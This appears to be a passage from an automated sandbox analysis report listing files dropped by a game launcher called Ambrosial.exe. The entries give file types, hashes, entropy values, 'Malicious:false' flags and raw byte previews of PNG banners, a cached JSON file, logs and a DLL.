                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):62018
                                                                                                                                                                                      Entropy (8bit):7.987071576746618
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:KmfNW8zEOcZ7rV8mHKrHidgggDMPbc0NCRxx8SESJJg:zFWimHmifgD8SxxNbJg
                                                                                                                                                                                      MD5:B4F8CBFF5719DD953DA41CA97E02CEF3
                                                                                                                                                                                      SHA1:6F9AA33EB02C019935290A30532FDDFB6C5FEDC6
                                                                                                                                                                                      SHA-256:45902EBC551982558160B90EB87D7DFF11F4BF514FAE8B4B9AA98E351E600174
                                                                                                                                                                                      SHA-512:9BE9D75482C01918B89BE888126502F750FECA8D71EAB4804AD422B71E11764C2E08A4C38A9A7B2B62503F5A76C17B5D778D01B48325E14D05736D061CE823F8
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^...uWU'~...HBBB.I...P.:...;.ba....mp....X..H.P. .(...{..!.........^{.}.........Yu.]N....;....n....:. ..V...k.........r..T.9...ae...[...*.`....t[.....U._.i.....r..u\..W.aF.....)1|.D.p......0+h.........y.ui.....@.r.EQT.66...y.V....]PY0.E}.2.t........6.....;..........=l.x..7....B7=.%@.B..1X..X..).c...f..V.......V.X.l<.f..F..m...:.....W...:..gu...)V.....j=.w.B....{.Xm.k..iU..#....6.k...H....F>.-.U...S.}...~.lBZ.m'6Q.e..`pRc3v.`..'v.P(+aV.. u...l?G..Y..E....g..}p..X....c[...S...f.n..I.V;.G...:...x65&.^.........@.......M?..........2.....4|...{.c.+.-.&..o.&r.!..N$....n.~....X.B.....~...h....7..S..$...k#..6....g].a.{.R...h....X-....=4.<s...l..!F.$.97.....j5.tul.....<u2....w8.1.QB.7.K..h'G..x....0/..[.#.s..N........feB.S.Y...L..u..2.l5..Z...D....i..m{..1L#..=k....rI.O..&...b..k<..0'.z..}...........).)..$.................=..B.L.R....b.g....^.+...g...F;
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.16.221\Zephyr Classic\launcherAssets\yeeee.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):117969
                                                                                                                                                                                      Entropy (8bit):7.978661379500052
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Qmkws6FGrnlJYltt6sKsnAWyYM5l6vnzp9CNsWiHxlgbw:Q4sRhaz6OnvyYM5l6vzpqsWiRz
                                                                                                                                                                                      MD5:57B901D65F2725D394D569C05DD34FA4
                                                                                                                                                                                      SHA1:CDB25673AE31BC33872C39EC02924C33D42BBA93
                                                                                                                                                                                      SHA-256:E6CE3CF2C8094AF5E4E8E24B1283A8711DFD34DBB2D47B0F373CE7349DFB5998
                                                                                                                                                                                      SHA-512:BEA29493C6B73D29E2E16F2F63FE49C9CF3D843156ACA838F3D5E0F2E917050D4E79DF3D44E09144E6A42F8C8A52BF4A0080F2DFF6356FC04F8D469841A894B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..{.u[....{..T....{S\....7.6w...b.H"0../`...D.D....d..D..J"E...$.l)..J..1.Q...nL.@CC...9..y~.3.c.w..*.{...1.c^.\s.w...{.....W7.^\././....I{.."E..r...x..r...r+...l.'.Q:.".`\........./...._]..'|."...@~_.f.|"~*~..r..K...vO..}..<..r...R..Cj..kr./.?..^z.B._..{*.>....R.}.....7J......{....=...<.u{y.R..l/^)].-....ls.1.o.{......=.j...O...oo46.z..`.._.6.}.}uy%.@.S.+.u3}.w.&).../~ Qx.P.@..b....V.\.:....._\^=S{._.J{...B.......;.V1.'.^.A\F.;O.s.....|..Dn.sA.:?.A=n.....8{T.<l....[.U...r.%.L....$..:....KW...z.....P] 6^..?...v.........y..J.[.x..R..U.M-.l.L[........]6.,.4.c[h.F...>.-.>..Nj..NS^...(U.y..a..X...tt_....*.f.v.M.q.:.s...1@w..\.{.84....a..!.^...c.l5.Z?....<..i..K.t.q.l..Q.c...|.m.....|...qe.\.$!._l.uA./..<.?{........gO/..}...../_...{....^."...8..Y.X....^.x.....7......;o.uy....I~...[..^.x.........=......C........b.............=.;Y..|.ln...7T.U....(.
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.1004.0\Zephyr Classic\launcherAssets\ZephyrBannerIcon-nxstBX5z.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):142661
                                                                                                                                                                                      Entropy (8bit):7.972333682578322
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:S+yemlrfqXKv4cba3cATezDWFEmfhG7k+b+wm7ix+4JRJ4G/7GqM:P0ZDOIEfAggC7ix+4JRJ4G/I
                                                                                                                                                                                      MD5:708B6DDEC8E3FA19C5D4CE27DF0CBA9B
                                                                                                                                                                                      SHA1:9742F97358B882065D39D8FF613DCC90FAF91300
                                                                                                                                                                                      SHA-256:6CFADE2F62685F0CDB4C7A7947F9EEED72C408497646D6D1F8CCF8D409D91105
                                                                                                                                                                                      SHA-512:EAD849799A54665DE671417D2B6FBD0E85FBBEA9BBDCFCC35F6A166CE2B673CA83F2AE99FD505BB62C661A8031A0BDCA360B6A2AF9AEC9D1545DE20C975FD65A
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..y..IV.Uo..R{UO/.=.4....(r.+.J\..........*a...W.@Q.P.C.(.(\d.....d.f.....{....w_k...9..~Y.4......'O..<......O.=q.D;::j.w...'....4..'..;.N.,......iw..u...v..DlB..8..I.9.GG...;.Heo....8.N.r....V>......N.gg.................5.............?.N.-.[..........'i.\k3'g.....>..n........Ssmav...<......;T.wT..UHeT..x=.2....N...#..}...q...f..r...dxW?.jnf...-.....i..s.|-.......|[R.3g.......f.gK......w.]2R}..ep.=.%...'...W.:%>fN...)=*}:!73{..@.].. .....G].o.....pv.....N....nnn..;.[.E........os....G.....[......]....T..Q}%.#...V].a_z...m.<T...~Kr;.W..........1w.T[..o.ss..-....pVcnA......^..![.Q....-...+.mk..=.....wN..>T;.5F5t...XYk..9..o....A....n..)%$....#o.#}.. {)\._...l...KK..hvaN.5o.S..H...~9......^zO..M.....-.~O{.W...Q;.-.SA......q5KX....-G:x...b.t.cQx..I.7:..a.Q'.sj.....T;..../.......8..tW.yR8;.{...H| ;tA.j7.v}{[..[j#.pR.....;.S.....r`..-.#..E...(
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.1101.0\Zephyr Classic\launcherAssets\zephyrNewB.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51625
                                                                                                                                                                                      Entropy (8bit):7.941581917245013
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:spu1o7CmCpqDtcPx3VgNV0n/1HczSDn3HjXwxKwEXId7D:spuo7CZqZqxlgN6dHcgU0oP
                                                                                                                                                                                      MD5:93A8E487AC8CE3F27B99B41DFFC28551
                                                                                                                                                                                      SHA1:3EF1DEC9D98DC84015FB0924DF6398CB4DF0DE41
                                                                                                                                                                                      SHA-256:2A6157DA3D3B511FCD05B67F6449C773663D3DC5B8328B808CCB2E4B4CF9F73B
                                                                                                                                                                                      SHA-512:18BA3EB47747FFAE1AFBF269B748FBBF4EAEE6CE8D7C73B0C8410164AD8CBFAC1AF765E6F542CED635F2355773EE623F8B516EF6454FE1C363FE3E9AE3D2959E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs...........k....>IDATx^...u.X.....;.M..{.D..9...9+....V"B$B"D..?.H.9v..BB(.J.n..>.Y................k.q.{.9.c.q.1....>......9.9..}6N..t....y7.|&....u*..+N......=.f.(.#.w%....M/^.gdc..Q..Z]/]..9.-....<.,.:.i..1.%...L>..>.....q.i.t..7Ck.Zy:....?..O..w..DH.l...-.Gl....e.L..H.Y...U.f.......D............a._...|.|.".:....._.._..../...,..........?..'>....l....y.K>..O-.......?..R.......?...,..f.[.1......6<m....y~f;.;.T}..O.q@..}...m...c.k.w...N+.L.{..=8....a..}.%c.>..q\g._..cU6.~m{Fh.}......&..........q...C.=u.v.(.+9[......$...9cr...i1k....e7...W.W^...s.#..Y?F.y...6....Q]..2.9.zu......\........?......s...%.......:...W....f..k.9.m..=..\..Qs'-.r..At..[.r.(.>...y..7K.....C'..:.d.gi.F...5'........21..qf....r.l.g:Az.....l.Wg/.....f..We.G;..pW...>....6..k.l.d.......m.....TuE}......5.......{..3.y......G.<.../...B.<l.........%.2?..O..:..Q'v8pr..w...$......G..$
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.2.0\Zephyr Classic\launcherAssets\yeeee.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):117969
                                                                                                                                                                                      Entropy (8bit):7.978661379500052
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Qmkws6FGrnlJYltt6sKsnAWyYM5l6vnzp9CNsWiHxlgbw:Q4sRhaz6OnvyYM5l6vzpqsWiRz
                                                                                                                                                                                      MD5:57B901D65F2725D394D569C05DD34FA4
                                                                                                                                                                                      SHA1:CDB25673AE31BC33872C39EC02924C33D42BBA93
                                                                                                                                                                                      SHA-256:E6CE3CF2C8094AF5E4E8E24B1283A8711DFD34DBB2D47B0F373CE7349DFB5998
                                                                                                                                                                                      SHA-512:BEA29493C6B73D29E2E16F2F63FE49C9CF3D843156ACA838F3D5E0F2E917050D4E79DF3D44E09144E6A42F8C8A52BF4A0080F2DFF6356FC04F8D469841A894B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..{.u[....{..T....{S\....7.6w...b.H"0../`...D.D....d..D..J"E...$.l)..J..1.Q...nL.@CC...9..y~.3.c.w..*.{...1.c^.\s.w...{.....W7.^\././....I{.."E..r...x..r...r+...l.'.Q:.".`\........./...._]..'|."...@~_.f.|"~*~..r..K...vO..}..<..r...R..Cj..kr./.?..^z.B._..{*.>....R.}.....7J......{....=...<.u{y.R..l/^)].-....ls.1.o.{......=.j...O...oo46.z..`.._.6.}.}uy%.@.S.+.u3}.w.&).../~ Qx.P.@..b....V.\.:....._\^=S{._.J{...B.......;.V1.'.^.A\F.;O.s.....|..Dn.sA.:?.A=n.....8{T.<l....[.U...r.%.L....$..:....KW...z.....P] 6^..?...v.........y..J.[.x..R..U.M-.l.L[........]6.,.4.c[h.F...>.-.>..Nj..NS^...(U.y..a..X...tt_....*.f.v.M.q.:.s...1@w..\.{.84....a..!.^...c.l5.Z?....<..i..K.t.q.l..Q.c...|.m.....|...qe.\.$!._l.uA./..<.?{........gO/..}...../_...{....^."...8..Y.X....^.x.....7......;o.uy....I~...[..^.x.........=......C........b.............=.;Y..|.ln...7T.U....(.
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.201.0\Zephyr Classic\launcherAssets\yeeee.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):117969
                                                                                                                                                                                      Entropy (8bit):7.978661379500052
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:Qmkws6FGrnlJYltt6sKsnAWyYM5l6vnzp9CNsWiHxlgbw:Q4sRhaz6OnvyYM5l6vzpqsWiRz
                                                                                                                                                                                      MD5:57B901D65F2725D394D569C05DD34FA4
                                                                                                                                                                                      SHA1:CDB25673AE31BC33872C39EC02924C33D42BBA93
                                                                                                                                                                                      SHA-256:E6CE3CF2C8094AF5E4E8E24B1283A8711DFD34DBB2D47B0F373CE7349DFB5998
                                                                                                                                                                                      SHA-512:BEA29493C6B73D29E2E16F2F63FE49C9CF3D843156ACA838F3D5E0F2E917050D4E79DF3D44E09144E6A42F8C8A52BF4A0080F2DFF6356FC04F8D469841A894B3
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs..........(J.....IDATx^..{.u[....{..T....{S\....7.6w...b.H"0../`...D.D....d..D..J"E...$.l)..J..1.Q...nL.@CC...9..y~.3.c.w..*.{...1.c^.\s.w...{.....W7.^\././....I{.."E..r...x..r...r+...l.'.Q:.".`\........./...._]..'|."...@~_.f.|"~*~..r..K...vO..}..<..r...R..Cj..kr./.?..^z.B._..{*.>....R.}.....7J......{....=...<.u{y.R..l/^)].-....ls.1.o.{......=.j...O...oo46.z..`.._.6.}.}uy%.@.S.+.u3}.w.&).../~ Qx.P.@..b....V.\.:....._\^=S{._.J{...B.......;.V1.'.^.A\F.;O.s.....|..Dn.sA.:?.A=n.....8{T.<l....[.U...r.%.L....$..:....KW...z.....P] 6^..?...v.........y..J.[.x..R..U.M-.l.L[........]6.,.4.c[h.F...>.-.>..Nj..NS^...(U.y..a..X...tt_....*.f.v.M.q.:.s...1@w..\.{.84....a..!.^...c.l5.Z?....<..i..K.t.q.l..Q.c...|.m.....|...qe.\.$!._l.uA./..<.?{........gO/..}...../_...{....^."...8..Y.X....^.x.....7......;o.uy....I~...[..^.x.........=......C........b.............=.;Y..|.ln...7T.U....(.
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.3202.0\Zephyr Classic\launcherAssets\zephyrNewB.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51625
                                                                                                                                                                                      Entropy (8bit):7.941581917245013
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:spu1o7CmCpqDtcPx3VgNV0n/1HczSDn3HjXwxKwEXId7D:spuo7CZqZqxlgN6dHcgU0oP
                                                                                                                                                                                      MD5:93A8E487AC8CE3F27B99B41DFFC28551
                                                                                                                                                                                      SHA1:3EF1DEC9D98DC84015FB0924DF6398CB4DF0DE41
                                                                                                                                                                                      SHA-256:2A6157DA3D3B511FCD05B67F6449C773663D3DC5B8328B808CCB2E4B4CF9F73B
                                                                                                                                                                                      SHA-512:18BA3EB47747FFAE1AFBF269B748FBBF4EAEE6CE8D7C73B0C8410164AD8CBFAC1AF765E6F542CED635F2355773EE623F8B516EF6454FE1C363FE3E9AE3D2959E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs...........k....>IDATx^...u.X.....;.M..{.D..9...9+....V"B$B"D..?.H.9v..BB(.J.n..>.Y................k.q.{.9.c.q.1....>......9.9..}6N..t....y7.|&....u*..+N......=.f.(.#.w%....M/^.gdc..Q..Z]/]..9.-....<.,.:.i..1.%...L>..>.....q.i.t..7Ck.Zy:....?..O..w..DH.l...-.Gl....e.L..H.Y...U.f.......D............a._...|.|.".:....._.._..../...,..........?..'>....l....y.K>..O-.......?..R.......?...,..f.[.1......6<m....y~f;.;.T}..O.q@..}...m...c.k.w...N+.L.{..=8....a..}.%c.>..q\g._..cU6.~m{Fh.}......&..........q...C.=u.v.(.+9[......$...9cr...i1k....e7...W.W^...s.#..Y?F.y...6....Q]..2.9.zu......\........?......s...%.......:...W....f..k.9.m..=..\..Qs'-.r..At..[.r.(.>...y..7K.....C'..:.d.gi.F...5'........21..qf....r.l.g:Az.....l.Wg/.....f..We.G;..pW...>....6..k.l.d.......m.....TuE}......5.......{..3.y......G.<.../...B.<l.........%.2?..O..:..Q'v8pr..w...$......G..$
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.4006.0\Zephyr\launcherAssets\zephyrNewB.png
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PNG image data, 618 x 191, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):51625
                                                                                                                                                                                      Entropy (8bit):7.941581917245013
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:1536:spu1o7CmCpqDtcPx3VgNV0n/1HczSDn3HjXwxKwEXId7D:spuo7CZqZqxlgN6dHcgU0oP
                                                                                                                                                                                      MD5:93A8E487AC8CE3F27B99B41DFFC28551
                                                                                                                                                                                      SHA1:3EF1DEC9D98DC84015FB0924DF6398CB4DF0DE41
                                                                                                                                                                                      SHA-256:2A6157DA3D3B511FCD05B67F6449C773663D3DC5B8328B808CCB2E4B4CF9F73B
                                                                                                                                                                                      SHA-512:18BA3EB47747FFAE1AFBF269B748FBBF4EAEE6CE8D7C73B0C8410164AD8CBFAC1AF765E6F542CED635F2355773EE623F8B516EF6454FE1C363FE3E9AE3D2959E
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: .PNG........IHDR...j.........N.......sRGB.........gAMA......a.....pHYs...........k....>IDATx^...u.X.....;.M..{.D..9...9+....V"B$B"D..?.H.9v..BB(.J.n..>.Y................k.q.{.9.c.q.1....>......9.9..}6N..t....y7.|&....u*..+N......=.f.(.#.w%....M/^.gdc..Q..Z]/]..9.-....<.,.:.i..1.%...L>..>.....q.i.t..7Ck.Zy:....?..O..w..DH.l...-.Gl....e.L..H.Y...U.f.......D............a._...|.|.".:....._.._..../...,..........?..'>....l....y.K>..O-.......?..R.......?...,..f.[.1......6<m....y~f;.;.T}..O.q@..}...m...c.k.w...N+.L.{..=8....a..}.%c.>..q\g._..cU6.~m{Fh.}......&..........q...C.=u.v.(.+9[......$...9cr...i1k....e7...W.W^...s.#..Y?F.y...6....Q]..2.9.zu......\........?......s...%.......:...W....f..k.9.m..=..\..Qs'-.r..At..[.r.(.>...y..7K.....C'..:.d.gi.F...5'........21..qf....r.l.g:Az.....l.Wg/.....f..We.G;..pW...>....6..k.l.d.......m.....TuE}......5.......{..3.y......G.<.../...B.<l.........%.2?..O..:..Q'v8pr..w...$......G..$
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\assets\clients\cachedclients.json
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:ASCII text, with very long lines
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):9177
                                                                                                                                                                                      Entropy (8bit):5.635762607544776
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:192:4h3GQNhG98ZBSw52EV4hBz6Ff6BbMWDyU+q/1P1vD/ruwEfbi1OD7x:45GqG2ZYw8EV4Pz6FyBbMyBz/hIbiQDV
                                                                                                                                                                                      MD5:3CAE8F137E4B739220262AA503FEE2AD
                                                                                                                                                                                      SHA1:FCFF4F4D8AE6EA31A34D24286066175FB43BAF92
                                                                                                                                                                                      SHA-256:A9B5E51F4F83F37B7EF60FDB403CECDA615A3B921391C805B039CC559BE5DF87
                                                                                                                                                                                      SHA-512:637EC17B81025DBD510ABE4692CE10C0FBD0A7789A096A94F8AA0E4C096FE6BC8D4EAAF27F5019E3A625F9567A86DD12B721DB455E043289F00A997050223256
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: amVUZEFTNDlzNmpQZ3lwVFVwTVpGb3VUbHFJcUQwMkZhVVdMcTNySmtvVmovcFFGcXhUQ0xPOS9UV0F6NExEblE5MXR6N3pJQ0hQY2hRZk9jTlVENE5KUUJJVHdmRUVWN2tKbng0czFaSCtrYklmTU9UblVMTDRFWlk1Rk9mRERDYlNrOWxpTW5ZZUlxQk9XbmozbE1qMXpkWTJVRmljOU12di9NdG4wdWExOE85NDBiRXM2NDQwZDdvRWlXV0dkNlRDQk0yL0E4UTl6MFd4QnlYRnNXMHR6eklXUDN2MUFHczN4VlJXTmlNSnZXeHB0T1h2dHdXZFdkZ3dRSWpiemkyTUNRV2RkbHhmQzBscG5VUG5xOTNtWkdVYjdZMzd4T3c3WUZrUnVjYXI2VmRXTG55UzkrMXhqT2ZUbEpIR1pXWVkvbkN0SkpHUE5DdUttdTd4RXVEVnB0anBTa09aSWIvZmNUZmRsRzNjYUptZUxSNGZtOUJGZnU4THREMmp2RFlIMzNEblhhdzVhSkQ2a21CekdteWg5VlluWWRoTWVxbkJkazQ2WVVoTjduWFBMZ29WNWdzd2VtWGNoRVo2czNrZTNudlluRlFqbEI5RkI1L3IvQisxalpUbG5NK3QvdHVCakdITEpISEZJTW40Wm1YR0ZaNHJzN1BjWFcrZUpDMVY1RWJKckw0SWE0c3BNUDRzSDczakJBdFp0bWs4cXBDTURmVFhkOE9panI1cXB2OG9qZXFIcTYyTm1ydVEya3NkcnZTdkZ3Uzk5RUhtQWk4aE9tdlAvZlIyUU11RHRhUHJsdUVQRzFGK0loY3dhMTYrbzUyckUwKzRKUVh4bng1a0oyTlFZbDE3dEJ3Yk1NMUdBa1ZhemdMMU9JODUyVVROQ09ianBZTDN2MlBTWHJoK3BaODRZZHJJKzNVYUFBN3lOUDZuZlpoT3AwVERjbm9lUU1kamlJL0ZZRUhIc1FuNW9aVE84WHpkNjFy
                                                                                                                                                                                      C:\Users\user\AppData\Local\Ambrosial\log.txt
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):10159
                                                                                                                                                                                      Entropy (8bit):5.461739424447609
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:96:PTzgGamsnWnnn1nrnNN3n2nSnNn3nqnqFn6e10:UnWnnn1nrnjn2nSnNn3nqnin6e2
                                                                                                                                                                                      MD5:40552AAC2BD83787E106F6A775CD88F8
                                                                                                                                                                                      SHA1:55855780DC6D53D1E614E06D425DE55DF8B82EB6
                                                                                                                                                                                      SHA-256:F49FA8CB085866DAD26654D1A2907FA90B9B81EC9F6808D9AE8AA09F8677F0A0
                                                                                                                                                                                      SHA-512:A1FFEB3388DDE4FA755E40E1E7A44473E7C9D682A81A766102DD28E186D4014E8ED9B25B022E5B00137CACB254FCCBB5AFE833BC3F7E4241CF177FF526F6A52D
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: 10/30/2021 01:51:34.303 || [AMBROSIAL-LAUNCHER] : Ambrosial launched!..10/30/2021 01:51:34.803 || [AMBROSIAL-LAUNCHER] : Attempting to get installed version..10/30/2021 01:51:35.303 || [AMBROSIAL-LAUNCHER] : Found installed game version: None detected..10/30/2021 01:51:37.147 || [AMBROSIAL-LAUNCHER] : Requested JSON type packet from URL...10/30/2021 01:51:37.803 || [AMBROSIAL-LAUNCHER] : Decrypted packet at 10/30/2021 1:51:37 PM..10/30/2021 01:51:39.256 || [AMBROSIAL-LAUNCHER] : Downloaded & cached clients...10/30/2021 01:52:02.303 || [AMBROSIAL-LAUNCHER] : Version added to Version Registry - (1.17.4006.0)..10/30/2021 01:52:02.897 || [AMBROSIAL-LAUNCHER] : Downloading banner asset: Attempted to find true path - C:\Users\user\AppData\Local\Ambrosial\assets\clients\1.17.4006.0\Zephyr\launcherAssets\zephyrNewB.png..10/30/2021 01:52:03.100 || [AMBROSIAL-LAUNCHER] : Zephyr's banner photo hasn't been cached! Starting download.....10/30/2021 01:52:03.303 || [AMBROSIAL-LAUNCHER] : Downloading
                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log
                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):2291
                                                                                                                                                                                      Entropy (8bit):5.3192079301865585
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:48:MxHKXwYHKhQnoOfHK7HKhBHKdHKB1AHKzvQTHmtHoxHImHKoLHG1qHjHKdHAH5HX:iqXwYqhQnoSq7qLqdqUqzcGtIxHbqoL1
                                                                                                                                                                                      MD5:F308D717AC4E1949837EF9279551D7F8
                                                                                                                                                                                      SHA1:C1573A367BB4B95C41BA2F365617A55D765D6966
                                                                                                                                                                                      SHA-256:7C628360FFB3D1BDECC28EEF7A8A593872CED817E67AFD15A0192DBE683F1C58
                                                                                                                                                                                      SHA-512:09BB131E3BC90C0959DA4CB8A6BD3E140959D1770DFB9B93C0223EBB1E806EE110F1E4F329C80FD837D028B843539DBB4C14A176846C498C9899F146C2313A45
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"SMDiagnostics, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IdentityModel, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\34957343ad5d84daee97a1affda91665\System.Runtime.Serialization.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicK
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\0e1a63fc-9228-4b4f-96fc-fee060f96e92\GunaDotNetRT64.dll
                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):146414
                                                                                                                                                                                      Entropy (8bit):6.346082537918833
                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                      SSDEEP:3072:tvfStxRL/l1JLnPynOuA7tuPkVg4qm5a4:ZKFJdvhqm5/
                                                                                                                                                                                      MD5:9C43F77CB7CFF27CB47ED67BABE3EDA5
                                                                                                                                                                                      SHA1:B0400CF68249369D21DE86BD26BB84CCFFD47C43
                                                                                                                                                                                      SHA-256:F25B9288FE370DCFCB4823FB4E44AB88C7F5FCE6E137D0DBA389A3DBA07D621E
                                                                                                                                                                                      SHA-512:CDE6FB6CF8DB6F9746E69E6C10214E60B3646700D70B49668A2A792E309714DD2D4C5A5241977A833A95FCDE8318ABCC89EB9968A5039A0B75726BBFA27125A7
                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                      • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                      • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 7%
                                                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                                                      • Filename: FIa4FloXT2.exe, Detection: malicious, Browse
                                                                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0..J0..J0..J_.&J3..J9..J;..J0..Jf..J_..J1..J+,.J1..J+,&J(..J+,.J1..J+,.J1..J+,.J1..JRich0..J........................PE..d......Y.........." .........0...............................................p......8&....@.............................................s.......x....@.......0...............P..................................................................`....................text...1........................... ..`.rdata..c...........................@..@.data...X.... ......................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P....... ..............`...........................................................................................................................................................................................................................................................
                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Ambrosial.exe
                                                                                                                                                                                      Process:C:\Users\user\Desktop\Ambrosial.exe
                                                                                                                                                                                      File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                      Size (bytes):16659456
                                                                                                                                                                                      Entropy (8bit):7.081485479978519
                                                                                                                                                                                      Encrypted:false
